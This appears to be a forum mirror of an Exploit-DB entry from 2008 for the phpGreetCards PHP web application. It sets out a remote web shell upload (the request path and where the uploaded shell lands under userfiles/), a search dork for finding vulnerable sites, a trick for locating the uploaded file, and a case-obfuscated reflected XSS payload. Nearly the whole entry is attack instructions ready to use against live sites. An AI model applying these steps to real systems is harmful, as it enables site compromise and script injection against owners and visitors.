- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7561
- Проверка EDB
-
- Пройдено
- Автор
- AHMADBADY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6849 cve-2008-6848
- Дата публикации
- 2008-12-23
Код:
...................................................................................................
****(remote shell upload/xss)****
script: phpGreetCards
***************************************************************************
download from:http://www.w2b.ru/download/phpGreetCards.zip
***************************************************************************
www.site.com/path/index.php?mode=select&category
shell: www.site.com/path/userfiles/number_shell.php
-----------------------------------------------------------------------------------------
dork:"powered by phpGreetCards"
if folder userfiles is forbidden
after get upload file u do right-click and see image properties and u see address file.
------------------------------------------------------------------------------------------
xss:
index.php?mode=select&category=>"><ScRiPt%20%0a%0d>alert(0)%3B</ScRiPt>
**************************************************
Author: ahmadbady
**************************************************
# milw0rm.com [2008-12-23]- Источник
- www.exploit-db.com
